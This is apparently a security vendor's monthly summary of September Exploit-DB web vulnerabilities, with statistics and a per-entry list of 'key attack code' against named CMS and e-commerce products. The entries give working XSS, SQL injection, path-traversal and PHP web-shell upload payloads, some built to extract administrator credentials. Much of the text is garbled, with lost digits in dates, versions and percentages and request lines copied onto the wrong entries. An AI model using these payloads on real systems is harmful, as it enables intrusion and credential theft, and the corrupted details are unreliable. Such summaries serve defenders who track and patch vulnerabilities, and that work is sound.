EDB Analysis Report (04.09)

Information on the vulnerabilities published on Exploit-DB (http://exploit-db.com) between 04.09.0 and 04.09.30, classified by vulnerability type.

Summary of analysis (prepared by: Penta Security Systems, Security Evaluation Team)

Analysis of the Exploit-DB entries published in September shows that Cross Site Scripting accounted for the largest number of reported vulnerabilities. Although the analysed Cross Site Scripting attacks are simple in terms of difficulty, a large number of these vulnerabilities were found in a few specific software products. Administrators running that software should apply updates and take particular care not to leave it exposed to Cross Site Scripting attacks.

This month a notably large number of Local File Inclusion vulnerabilities were also reported. These are very high-risk vulnerabilities: a successful attack can expose not only the server's account information but other sensitive files as well, and can therefore cause critical damage. Server administrators need to validate user input strictly in order to block Local File Inclusion attacks.

Looking at the vulnerability counts by major software, the largest number of vulnerabilities was reported in one product whose name is not legible in the source, followed by two further products (names also not legible) and Zen Cart. The first two are commonly used CMS products and the latter two are widely used open e-commerce solutions. All four are in wide use, so anyone running one of them must apply vulnerability security patches regularly in order to be prepared for these vulnerabilities.

1. Reported vulnerabilities by type
(Counts and percentages in the tables below are reproduced as they appear in the source; some digits did not survive extraction.)

   Vulnerability type     Count
   XSS                    8
   SQL Injection          4
   LFI                    8
   (type not legible)     4
   File Upload            (not legible)
   Total                  45

2. Classification by risk level

   Risk level   Count   Percentage
   High         7       0.00%
   Medium       8       40.00%
   Low          0       0.00%
   Total        45      00.00%

3. Attack difficulty

   Difficulty   Count            Percentage
   High         4                8.89%
   Medium       (not legible)    .%
   Low          40               88.89%
   Total        45               00.00%

4. Vulnerabilities by major software
(Per-software counts are not legible in the source; the total is 45.)

   (name not legible), Zen Cart, ManageEngine Desktop, vbulletin, MyBB, PHP Stock Management System, LoadedCommerce, Mpay4, phpmyfaq, Atmail, LittleSite, webedition, Restaurant Script (PizzaInn Project), Glype, Cart Engine, OsClass

** Details of vulnerabilities in major software with 5 or more reports
(Fields: EDB number, vulnerability type, difficulty / risk, vulnerability name. In the difficulty and risk columns only the value "Medium" survived extraction.)

Software name not legible in the source:
   3454    File Upload         Slideshow Gallery Plugin .4. - admin.php File Upload vulnerability
   345     (type not listed)   Multiple Themes - admin-ajax.php vulnerability
   3454    SQL Injection       Huge-IT Image Gallery .0. - admin.php SQL Injection
   34553   SQL Injection       Like Dislike Counter ..3 Plugin - ajax_counter.php SQL Injection
   34578   LFI                 Acento Theme - view-pdf.php LFI vulnerability
   34589   SQL Injection  Medium   WP Support Plus Responsive Ticket System .0 Plugin - admin-ajax.php SQL Injection
   34589   LFI                 WP Support Plus Responsive Ticket System .0 Plugin - downloadattachment.php SQL
   3478    SQL Injection       All In One WP Security Plugin 3.8. - admin.php SQL Injection
   347     XSS            Medium   Login Widget With Shortcode 3.. - options-general.php XSS vulnerability
   3457    SQL Injection       Spider Calendar <= 3.. - index.php SQL Injection
   345     SQL Injection       Spider Contacts .3. - index.php SQL Injection
   3437    SQL Injection       Spider Form Maker <= 3.4 - index.php SQL Injection
   34755   LFI                 Mac Gallery .5 - index.php LFI vulnerability
   34754   SQL Injection       Face Gallery .0 - index.php SQL Injection
   34754   LFI                 Face Gallery .0 - index.php LFI vulnerability

Software name not legible in the source:
   3458    XSS            Medium   - mail.php XSS vulnerability
   3458    XSS            Medium   - newsletters.php XSS vulnerability
   3458    XSS            Medium   - banner_manager.php XSS vulnerability
   3458    XSS            Medium   - countries.php XSS vulnerability
   3458    XSS            Medium   - currencies.php XSS vulnerability
   3458    XSS            Medium   - languages.php XSS vulnerability

Zen Cart:
   3458    XSS            Medium   Zen Cart .5.3 - media_types.php XSS vulnerability
   3458    XSS            Medium   Zen Cart .5.3 - media_manager.php XSS vulnerability
   3458    XSS            Medium   Zen Cart .5.3 - music_genre.php XSS vulnerability
   3458    XSS            Medium   Zen Cart .5.3 - record_company.php XSS vulnerability
   3458    XSS            Medium   Zen Cart .5.3 - record_artists.php XSS vulnerability
Detailed vulnerability list
(Fields: date, EDB number, vulnerability type, difficulty / risk, vulnerability name, target program, target environment, key attack code. In the difficulty and risk columns only the value "Medium" survived extraction; where the type column is empty it is marked "not listed".)

04-09-0 | EDB 34405 | XSS | Medium
  PHP Stock Management System .0 - update_details.php XSS vulnerability
  Target program: PHP Stock Management System / Target environment: PHP Stock Management System .0
  Key attack code:
    POST /posnic-.0/update_details.php HTTP/.
    sname=%3cscript%3ealert%8%9%3b%3c%fscript%3e&address=ghala+mandi&place=old+road&city=multan&pin=&phone=033570&website=www.hashmitech.webs.com&email=umar%40gmail.com&submit=update

04-09-0 | EDB 3458 | (type not listed)
  ManageEngine Desktop - /statusupdate vulnerability
  Target program: ManageEngine Desktop / Target environment: ManageEngine Desktop
  Key attack code:
    POST /statusupdate?actiontocall=lfu&customerid=337&filename=../../../../../../shell.jsp&configdataid= HTTP/.

04-09-0 | EDB 3458 | (type not listed)
  ManageEngine Desktop - /mdmloguploader vulnerability
  Target program: ManageEngine Desktop / Target environment: ManageEngine Desktop
  Key attack code:
    POST /mdm/mdmloguploader?filename=..\\..\\..\webapps\\Desktop\\shell.jsp HTTP/.

04-09-0 | EDB 3458 | (type not listed)
  ManageEngine Desktop - /agentloguploader vulnerability
  Target program: ManageEngine Desktop / Target environment: ManageEngine Desktop
  Key attack code:
    POST /agentloguploader?computername=whatever&domainname=whatever&customerid=337&filename=..\\..\\..\\..\\webapps\\desktop\\shell.jsp HTTP/.

04-09-0 | EDB 3454 | File Upload
  Slideshow Gallery Plugin .4. - admin.php File Upload vulnerability
  Target environment: Slideshow Gallery Plugin .4.
  Key attack code:
    POST http://9.8.3.8/wordpress/wpadmin/admin.php?page=slideshow-slides&method=save HTTP/.
    (multipart/form-data, boundary --------------7dd009908f)
    -----------------------------7dd009908f
    filename="backdoor.php"
    <?php passthru($_get['cmd']);?>
    -----------------------------7dd009908f--

04-09-0 | EDB 345 | (type not listed)
  Multiple Themes - admin-ajax.php vulnerability
  Key attack code:
    /wp-admin/adminajax.php?action=revslider_show_image&img=../wpconfig.php

04-09-0 | EDB 3454 | SQL Injection
  Huge-IT Image Gallery .0. - admin.php SQL Injection
  Target environment: Huge-IT Image Gallery .0.
  Key attack code:
    /wordpress/wpadmin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=&removeslide=%0and%0=

04-09-03 | EDB 345 | SQL Injection
  vbulletin 4.0.x - 4.. - search.php SQL Injection
  Target program: vbulletin / Target environment: vbulletin 4.0.x - 4..
  Key attack code (as shown in the source for this entry):
    POST /wp-content/plugins/like-dislike-counter-for-postspages-and-comments/ajax_counter.php HTTP/.
    post_id%3d%0and%0%3d%up_type%3dlike

04-09-05 | EDB 34539 | XSS | Medium
  MyBB User Social Networks Plugin . - usercp.php XSS vulnerability
  Target program: MyBB / Target environment: MyBB User Social Networks Plugin .
  Key attack code:
    POST /mybb/usercp.php HTTP/.
    my_post_key=a3baa4af93035458a448dda4b&bday=&bday=&bday3=&birthdayprivacy=all&website=http%3A%F%F&profile_fields%5Bfid3%5D=Undisclosed&profile_fields%5bfid%5d=&profile_fields%5bfid%5d=&icq=&aim=&msn=&yahoo=%3e%3cscript%3ealert%8document.cookie%9%3c%fscript%3e%3c&away=0&awayreason=&awayday=&awaymonth=&awayyear=&action=do_profile&regsubmit=update+profile

04-09-07 | EDB 34553 | SQL Injection
  Like Dislike Counter ..3 Plugin - ajax_counter.php SQL Injection
  Target environment: Like Dislike Counter ..3 Plugin
  Key attack code:
    POST /wp-content/plugins/like-dislike-counter-for-postspages-and-comments/ajax_counter.php HTTP/.
    post_id%3d%0and%0%3d%up_type%3dlike

04-09-07 | EDB 3455 | SQL Injection
  LoadedCommerce7 - /register/ SQL Injection
  Target program: LoadedCommerce / Target environment: LoadedCommerce7
  Key attack code:
    POST /register/ HTTP/.
    (multipart/form-data, boundary --------------7dd009908f)
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="field_"
    :entry_lastname,
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="field_"
    ,(select user_name from lc_administrators order by id asc limit ),(select user_password from lc_administrators order by id asc limit ),3,4,5,,7,8,9,0)#
    -----------------------------7dd009908f
    filename=""

04-09-08 | EDB 3458 | SQL Injection
  Mpay4 PrestaShop Payment Module .5 - confirm.php SQL Injection
  Target program: Mpay4 / Target environment: Mpay4 PrestaShop Payment Module .5
  Key attack code:
    /modules/mpay4/confirm.php?mpaytid=&status=bbb&TID=a%7%0or%0%7a%7%0in%0%8select%0IF%8SUBSTR%8@@version,,%9=5,BENCHMARK%8000000,SHA%80xDEADBEEF%9%9,%0false%9%9;%0--%3

04-09-08 | EDB 3458 | XSS | Medium
  (software name not legible) - mail.php XSS vulnerability
  Key attack code:
    /catalog/admin/mail.php?action=preview HTTP/.
    customers_email_address=<script>alert()</script>&from=fuck@shit.up&subject=test&message=test

04-09-08 | EDB 3458 | XSS | Medium
  (software name not legible) - newsletters.php XSS vulnerability
  Key attack code:
    /catalog/admin/newsletters.php?action=insert HTTP/.
    module=newsletter&title=<script>alert(3)</script>&content=<script>alert(45)</script>

04-09-08 | EDB 3458 | XSS | Medium
  (software name not legible) - banner_manager.php XSS vulnerability
  Key attack code:
    /catalog/admin/banner_manager.php?action=insert HTTP/.
    (multipart/form-data, boundary --------------7dd009908f)
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="banners_title"
    <script>alert();</script>
    -----------------------------7dd009908f
    filename="info.gif"
    <?php passthru($_get['cmd']);?>
    -----------------------------7dd009908f--

04-09-08 | EDB 3458 | XSS | Medium
  (software name not legible) - countries.php XSS vulnerability
  Key attack code:
    /catalog/admin/countries.php?page=&action=insert HTTP/.
    countries_name=aaa<script>alert()</script>

04-09-08 | EDB 3458 | XSS | Medium
  (software name not legible) - currencies.php XSS vulnerability
  Key attack code:
    /catalog/admin/currencies.php?page=&action=insert HTTP/.
    title=<script>alert()</script>

04-09-08 | EDB 3458 | XSS | Medium
  (software name not legible) - languages.php XSS vulnerability
  Key attack code:
    /catalog/admin/languages.php?action=insert HTTP/.
    name=<script>alert()</script>

04-09-08 | EDB 34579 | XSS | Medium
  vbulletin 5..X - /gallery XSS vulnerability
  Target program: vbulletin / Target environment: vbulletin 5..X
  Key attack code:
    POST /create-content/gallery HTTP/.
    (multipart/form-data, boundary --------------7dd009908f)
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="title_3"
    cool" onmouseover=alert() xssed="
    -----------------------------7dd009908f
    filename=""
    -----------------------------7dd009908f--

04-09-08 | EDB 34580 | XSS | Medium
  phpmyfaq .8.x - index.php XSS vulnerability
  Target program: phpmyfaq / Target environment: phpmyfaq .8.x
  Key attack code:
    GET /phpmyfaq/index.php HTTP/.
    User-Agent: <script>alert()</script>
    Referer: <script>alert(3)</script>

04-09-08 | EDB 3457 | SQL Injection
  Spider Calendar <= 3.. - index.php SQL Injection vulnerability
  Target environment: Spider Calendar <= 3..
  Key attack code:
    /joomla/index.php?option=com_spidercalendar&calendar_id=%0and%0=--

04-09-08 | EDB 3458 | XSS | Medium
  Zen Cart .5.3 - media_types.php XSS vulnerability
  Target program: Zen Cart / Target environment: Zen Cart .5.3
  Key attack code:
    POST /zen/zen-cart-v.5.3-070404/admin3/media_types.php?page=&mid=&action=save HTTP/.
    (multipart/form-data, boundary --------------7dd009908f)
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="type_name"
    <script>alert()</script>
    -----------------------------7dd009908f

04-09-08 | EDB 3458 | XSS | Medium
  Zen Cart .5.3 - media_manager.php XSS vulnerability
  Target program: Zen Cart / Target environment: Zen Cart .5.3
  Key attack code (request line as given in the source):
    POST /zen/zen-cart-v.5.3-070404/admin3/media_types.php?page=&mid=&action=save HTTP/.
    (multipart/form-data, boundary --------------7dd009908f)
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="media_name"
    <script>alert()</script>
    -----------------------------7dd009908f

04-09-08 | EDB 3458 | XSS | Medium
  Zen Cart .5.3 - music_genre.php XSS vulnerability
  Target program: Zen Cart / Target environment: Zen Cart .5.3
  Key attack code:
    POST /zen/zen-cart-v.5.3-070404/admin3/music_genre.php?action=insert HTTP/.
    (multipart/form-data, boundary --------------7dd009908f)
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="music_genre_name"
    <script>alert()</script>
    -----------------------------7dd009908f

04-09-08 | EDB 3458 | XSS | Medium
  Zen Cart .5.3 - record_company.php XSS vulnerability
  Target program: Zen Cart / Target environment: Zen Cart .5.3
  Key attack code:
    POST /zen/zen-cart-v.5.3-070404/admin3/record_company.php?action=insert HTTP/.
    (multipart/form-data, boundary --------------7dd009908f)
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="record_company_name"
    <script>alert()</script>
    -----------------------------7dd009908f

04-09-08 | EDB 3458 | XSS | Medium
  Zen Cart .5.3 - record_artists.php XSS vulnerability
  Target program: Zen Cart / Target environment: Zen Cart .5.3
  Key attack code:
    POST /zen/zen-cart-v.5.3-070404/admin3/record_artists.php?action=insert HTTP/.
    (multipart/form-data, boundary --------------7dd009908f)
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="artists_name"
    <script>alert()</script>
    -----------------------------7dd009908f

04-09-08 | EDB 34578 | LFI
  Acento Theme - view-pdf.php LFI vulnerability
  Target environment: Acento Theme
  Key attack code:
    /wp-content/themes/acento/includes/viewpdf.php?download=&file=/etc/passwd

04-09-08 | EDB 34585 | XSS | Medium
  Atmail Webmail 7. - /mail/index.php/mail/mail/listfoldermessages/searching/true/selectfolder/inbox./resultcontext/searchresultstab XSS vulnerability
  Target program: Atmail / Target environment: Atmail Webmail 7.
  Key attack code:
    POST /mail/index.php/mail/mail/listfoldermessages/searching/true/selectfolder/inbox./resultcontext/searchresultstab HTTP/.
    searchquery=&goback=&from=&to=&subject=&body=&filter=<script>alert()</script>

04-09-09 | EDB 34589 | SQL Injection | Medium
  WP Support Plus Responsive Ticket System .0 Plugin - admin-ajax.php SQL Injection
  Target environment: WP Support Plus Responsive Ticket System .0 Plugin
  Key attack code:
    POST /wp-admin/admin-ajax.php HTTP/.
    action=openticket&ticket_id=- UNION SELECT concat_ws(0x3a,version(),database(),user()),,3,4,5,,7
    * any registered user can successfully execute this request

04-09-09 | EDB 34589 | LFI
  WP Support Plus Responsive Ticket System .0 Plugin - downloadattachment.php SQL
  Target environment: WP Support Plus Responsive Ticket System .0 Plugin
  Key attack code:
    /wp-content/plugins/wp-support-plus-responsive-ticketsystem/includes/admin/downloadattachment.php?path=/etc/passwd

04-09- | EDB 345 | SQL Injection
  Spider Contacts .3. - index.php SQL Injection
  Target environment: Spider Contacts .3.
  Key attack code:
    /joomla/index.php?option=com_spidercontacts&contact_id=%0and%0=&view=showcontact&lang=ca

04-09- | EDB 3437 | SQL Injection
  Spider Form Maker <= 3.4 - index.php SQL Injection
  Target environment: Spider Form Maker <= 3.4
  Key attack code:
    /index.php?option=com_formmaker&view=formmaker&id=%0and%0=

04-09-0 | EDB 347 | SQL Injection
  SelectSurvey.net - ReviewReadOnlySurvey.aspx SQL Injection
  Target environment: SelectSurvey.net 4.4.004
  Key attack code:
    /survey/reviewreadonlysurvey.aspx?responseid=<num>&SurveyID=%0and%0=

04-09-0 | EDB 347 | SQL Injection
  SelectSurvey.net - UploadImagePopupToDb.aspx SQL Injection
  Target environment: SelectSurvey.net 4.4.004
  Key attack code:
    /survey/uploadimagepopuptodb.aspx?responseid=<num>&SurveyID=%0and%0=

04-09-3 | EDB 34747 | LFI
  LittleSite 0. - index.php LFI vulnerability
  Target program: LittleSite / Target environment: LittleSite 0.
  Key attack code:
    /littlesite/index.php?file=../../../../etc/passwd

04-09-4 | EDB 347 | LFI
  webedition .3.8.0 - showtempfile.php LFI vulnerability
  Target program: webedition / Target environment: webedition .3.8.0
  Key attack code:
    /webedition/showtempfile.php?file=../../../../etc/passwd

04-09-4 | EDB 3470 | XSS | Medium
  Restaurant Script (PizzaInn Project) - register-exec.php XSS vulnerability
  Target program: Restaurant Script (PizzaInn Project) / Target environment: Restaurant Script (PizzaInn Project)
  Key attack code:
    /PizzaInn/register-exec.php?fname=<script>alert()</script>&lname=<script>alert()</script>&login=<script>alert()</script>&password=r00t&cpassword=r00t&question=8&answer=hack4&submit=register

04-09-4 | EDB 34755 | LFI
  Mac Gallery .5 - index.php LFI vulnerability
  Target environment: Mac Gallery .5
  Key attack code:
    /index.php?option=com_macgallery&view=download&albumid=../../etc/passwd

04-09-4 | EDB 34754 | SQL Injection
  Face Gallery .0 - index.php SQL Injection
  Target environment: Face Gallery .0
  Key attack code:
    /index.php?option=com_facegallery&view=images&aid=%0and%0=&lang=en

04-09-4 | EDB 34754 | LFI
  Face Gallery .0 - index.php LFI vulnerability
  Target environment: Face Gallery .0
  Key attack code:
    /index.php?option=com_facegallery&task=imagedownload&img_name=../../etc/passwd

04-09-4 | EDB 34758 | LFI
  Glype .4.9 - browse.php LFI vulnerability
  Target program: Glype / Target environment: Glype .4.9
  Key attack code:
    GET /browse.php?u=&b=8 HTTP/.
    Cookie: s=../security

04-09-5 | EDB 3478 | SQL Injection
  All In One WP Security Plugin 3.8. - admin.php SQL Injection
  Target environment: All In One WP Security Plugin 3.8.
  Key attack code:
    /wpadmin/admin.php?page=aiowpsec&tab=tab&order=,%8select%0load_file%8CONCAT%8CHAR%89%9,CHAR%89%9,%8select%0version%8%9%9,CHAR%84%9,CHAR%897%9,CHAR%8%9,CHAR%8%9,CHAR%897%9,CHAR%899%9,CHAR%807%9,CHAR%80%9,CHAR%84%9,CHAR%84%9,CHAR%899%9,CHAR%8%9,CHAR%809%9,CHAR%89%9,CHAR%80%9,CHAR%8%9,CHAR%8%9,CHAR%898%9,CHAR%897%9,CHAR%84%9%9%9%9

04-09-5 | EDB 3474 | SQL Injection
  Cart Engine 3.0 - cart.php SQL Injection
  Target program: Cart Engine / Target environment: Cart Engine 3.0
  Key attack code (request line as given in the source):
    POST /zen/zen-cart-v.5.3-070404/admin3/media_types.php?page=&mid=&action=save HTTP/.
    (multipart/form-data, boundary --------------7dd009908f)
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="item_id[0]"
    8' AND (SELECT FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,floor(rand()*))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
    -----------------------------7dd009908f
    filename=""

04-09-5 | EDB 3473 | LFI
  OsClass 3.4. - index.php LFI vulnerability
  Target program: OsClass / Target environment: OsClass 3.4.
  Key attack code:
    /osclass/ocadmin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd

04-09-5 | EDB 347 | XSS | Medium
  Login Widget With Shortcode 3.. - optionsgeneral.php XSS vulnerability
  Target environment: Login Widget With Shortcode 3..
  Key attack code:
    POST /wp-admin/optionsgeneral.php?page=login_widget_afo HTTP/.
    custom_style_afo=</textarea><script>alert()</script>